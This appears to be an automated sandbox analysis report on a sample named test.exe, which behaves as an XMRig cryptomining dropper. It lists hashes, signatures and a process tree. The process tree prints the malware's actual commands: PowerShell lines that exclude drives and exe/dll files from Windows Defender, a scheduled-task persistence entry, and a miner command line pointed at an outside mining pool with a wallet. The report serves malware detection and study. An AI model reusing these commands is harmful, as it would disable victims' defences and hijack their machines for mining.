Analysis
-
max time kernel
382s -
max time network
386s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
04/09/2024, 18:22
Static task
static1
Behavioral task
behavioral1
Sample
test.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
test.exe
Resource
win7-20240729-en
Behavioral task
behavioral3
Sample
test.exe
Resource
win10-20240404-en
Behavioral task
behavioral4
Sample
test.exe
Resource
win10v2004-20240802-en
General
-
Target
test.exe
-
Size
29.7MB
-
MD5
531a4e282c420c64d7b545a9c4e0fb4d
-
SHA1
998d298e9ff967bec6f03bf8e8e8f03b4b3728db
-
SHA256
98ced6e951485c45ebdeda3bbc04bd2918867e0490900b39789d9b4637a7409c
-
SHA512
c1d8296e2ba1e1ca9e1860548b884414e2cde06c584c40a4306d248b9c9ccbbff7e55a717d742ea14cc849db41838cfa6feb7638d888c627ff95abcb13df6730
-
SSDEEP
786432:k99QkndbvqJ6+eH57FU4hxLq54xTxyCuYWQzJ2Mbvn:i1nM8hHxPhxO5iTECuYWQzJ7bv
Malware Config
Signatures
-
XMRig Miner payload 20 IoCs
resource yara_rule behavioral2/memory/2936-51-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2936-53-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2936-46-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2936-68-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2936-66-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2936-63-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2936-61-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2936-59-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2936-57-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2936-71-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2936-74-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2936-72-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2936-70-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2936-73-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2936-55-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2936-49-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2936-75-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2936-78-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2936-79-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2936-77-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2896 powershell.exe 2920 powershell.exe 2500 powershell.exe 2876 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2684 services64.exe -
Loads dropped DLL 1 IoCs
pid Process 2760 cmd.exe -
Drops file in System32 directory 7 IoCs
description ioc Process File created C:\Windows\system32\services64.exe conhost.exe File opened for modification C:\Windows\system32\services64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\WR64.sys conhost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2180 set thread context of 2936 2180 conhost.exe 46 -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2840 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2896 powershell.exe 2920 powershell.exe 2500 powershell.exe 2876 powershell.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 2896 powershell.exe Token: SeDebugPrivilege 2920 powershell.exe Token: SeDebugPrivilege 2180 conhost.exe Token: SeDebugPrivilege 2500 powershell.exe Token: SeDebugPrivilege 2876 powershell.exe Token: SeLockMemoryPrivilege 2936 svchost.exe Token: SeLockMemoryPrivilege 2936 svchost.exe -
Suspicious use of WriteProcessMemory 54 IoCs
description pid Process procid_target PID 1744 wrote to memory of 2152 1744 test.exe 29 PID 1744 wrote to memory of 2152 1744 test.exe 29 PID 1744 wrote to memory of 2152 1744 test.exe 29 PID 1744 wrote to memory of 2152 1744 test.exe 29 PID 2152 wrote to memory of 2780 2152 conhost.exe 30 PID 2152 wrote to memory of 2780 2152 conhost.exe 30 PID 2152 wrote to memory of 2780 2152 conhost.exe 30 PID 2152 wrote to memory of 2844 2152 conhost.exe 32 PID 2152 wrote to memory of 2844 2152 conhost.exe 32 PID 2152 wrote to memory of 2844 2152 conhost.exe 32 PID 2780 wrote to memory of 2896 2780 cmd.exe 34 PID 2780 wrote to memory of 2896 2780 cmd.exe 34 PID 2780 wrote to memory of 2896 2780 cmd.exe 34 PID 2844 wrote to memory of 2840 2844 cmd.exe 35 PID 2844 wrote to memory of 2840 2844 cmd.exe 35 PID 2844 wrote to memory of 2840 2844 cmd.exe 35 PID 2780 wrote to memory of 2920 2780 cmd.exe 36 PID 2780 wrote to memory of 2920 2780 cmd.exe 36 PID 2780 wrote to memory of 2920 2780 cmd.exe 36 PID 2152 wrote to memory of 2760 2152 conhost.exe 37 PID 2152 wrote to memory of 2760 2152 conhost.exe 37 PID 2152 wrote to memory of 2760 2152 conhost.exe 37 PID 2760 wrote to memory of 2684 2760 cmd.exe 39 PID 2760 wrote to memory of 2684 2760 cmd.exe 39 PID 2760 wrote to memory of 2684 2760 cmd.exe 39 PID 2684 wrote to memory of 2180 2684 services64.exe 40 PID 2684 wrote to memory of 2180 2684 services64.exe 40 PID 2684 wrote to memory of 2180 2684 services64.exe 40 PID 2684 wrote to memory of 2180 2684 services64.exe 40 PID 2180 wrote to memory of 1076 2180 conhost.exe 41 PID 2180 wrote to memory of 1076 2180 conhost.exe 41 PID 2180 wrote to memory of 1076 2180 conhost.exe 41 PID 1076 wrote to memory of 2500 1076 cmd.exe 43 PID 1076 wrote to memory of 2500 1076 cmd.exe 43 PID 1076 wrote to memory of 2500 1076 cmd.exe 43 PID 1076 wrote to memory of 2876 1076 cmd.exe 45 PID 1076 wrote to memory of 2876 1076 cmd.exe 45 PID 1076 wrote to memory of 2876 1076 cmd.exe 45 PID 2180 wrote to memory of 2936 2180 conhost.exe 46 PID 2180 wrote to memory of 2936 2180 conhost.exe 46 PID 2180 wrote to memory of 2936 2180 conhost.exe 46 PID 2180 wrote to memory of 2936 2180 conhost.exe 46 PID 2180 wrote to memory of 2936 2180 conhost.exe 46 PID 2180 wrote to memory of 2936 2180 conhost.exe 46 PID 2180 wrote to memory of 2936 2180 conhost.exe 46 PID 2180 wrote to memory of 2936 2180 conhost.exe 46 PID 2180 wrote to memory of 2936 2180 conhost.exe 46 PID 2180 wrote to memory of 2936 2180 conhost.exe 46 PID 2180 wrote to memory of 2936 2180 conhost.exe 46 PID 2180 wrote to memory of 2936 2180 conhost.exe 46 PID 2180 wrote to memory of 2936 2180 conhost.exe 46 PID 2180 wrote to memory of 2936 2180 conhost.exe 46 PID 2180 wrote to memory of 2936 2180 conhost.exe 46 PID 2180 wrote to memory of 2936 2180 conhost.exe 46 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\test.exe"C:\Users\Admin\AppData\Local\Temp\test.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\test.exe"2⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:2840
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"5⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit6⤵
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-
-
C:\Windows\System32\svchost.exeC:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:3333 --user=47nUe8D3z4bjgwqG9v4tKY3sBMcoEdvQ3iJMC8A8udU7DngaeR7hNhKETaaQD1iWhadw6j9iNWqf6fKiVcMy35kdVbxAzyD --pass= --cpu-max-threads-hint=60 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c0a6f6bb3487857aa6d4ea1126dd4d7d
SHA17f184822523affb719c86244b31e8f5033fed4e4
SHA25615aae6fdafb11c79efb48f0f1c99a3eba18b9f2d102428e461cf97370afe91d2
SHA512b4b34cfedd78c2e7c3d7e23b8df7737c92967f3b6db3267bf99300d664ed6c5f2f81a1cc7b88d346fa3e70e8c479bd7191958df5567a2c3fbc178be622c46e2d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UAM7L4YUYL2ULU9MSRDY.temp
Filesize7KB
MD5b094557184777f3f6d900edb010357d7
SHA1deb155fb4902abe7dbe76d39b53c4e4df551d6ea
SHA25668bc416ac93515c602e009d39d0f9530da41d1cd004d522d804bf2d1466a7195
SHA5123364e8f0f7dc40d9dd0e6f775caab0211b046ba152325819c2bf6361d228d8c80dddf15c7df0fcc9d6ee158edcd14a542c7a81343d995532923338261c3e2b96
-
Filesize
29.7MB
MD5531a4e282c420c64d7b545a9c4e0fb4d
SHA1998d298e9ff967bec6f03bf8e8e8f03b4b3728db
SHA25698ced6e951485c45ebdeda3bbc04bd2918867e0490900b39789d9b4637a7409c
SHA512c1d8296e2ba1e1ca9e1860548b884414e2cde06c584c40a4306d248b9c9ccbbff7e55a717d742ea14cc849db41838cfa6feb7638d888c627ff95abcb13df6730